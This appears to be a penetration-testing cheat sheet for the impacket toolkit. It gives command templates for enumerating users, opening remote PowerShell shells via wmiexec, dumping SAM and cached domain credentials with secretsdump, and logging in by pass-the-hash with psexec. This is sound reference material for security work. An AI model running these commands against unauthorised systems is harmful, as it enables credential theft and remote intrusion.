impacket ¶

impacket (12.4k ⭐) is a collection of python classes for working with network protocols. They are already installed on Kali:

$ impacket-secretsdump # secretsdump.py
$ ...

You may install them manually too:

$ sudo git clone https://github.com/fortra/impacket /opt/impacket
$ cd /opt/impacket
$ pip install -r requirements.txt
$ pip install .
$ python /opt/impacket/examples/secretsdump.py [...]

Samrdump ¶

List users and domains.

$ impacket-samrdump IP
$ impacket-samrdump username:password@IP

wmiexec ¶

Pop a powershell or run commands using DCOM:

$ impacket-wmiexec -shell-type powershell username:password@IP
$ impacket-wmiexec -shell-type powershell username:password@IP "hostname"

mssqlclient ¶

Connect to a MSSQL database.

$ impacket-mssqlclient username@IP -windows-auth
$ impacket-mssqlclient username:password@IP -windows-auth
SQL> exit

Dump hashes from backup ¶

Dump hashes from a backup of SAM and SYSTEM hashes. There are local credentials and domain cached credentials.

$ impacket-secretsdump -sam XXX -system YYY LOCAL
$ impacket-secretsdump -sam XXX -security XXX -system XXX LOCAL
<output format is explained in the output>

PsExec ¶

Use a hash to login (Pass-The-Hash).

$ impacket-psexec -hashes usernamehash:sessionhash username@IP
$ impacket-psexec -hashes :hash username@IP

SMB server ¶

Run a SMB server to which user will connect with the username XXX and the password YYY. Files will be stored in /path/to/share.

$ impacket-smbserver -smb2support -username XXX -password YYY share_name /path/to/share
$ impacket-smbserver -smb2support share_name /path/to/share

SMB Client ¶

Alternative to smbclient. It works even when the former doesn't.

$ impacket-smbclient 'username':'password'@IP
$ impacket-smbclient IP
# shares
<list of shares>
# use <sharename>
# ls
# tree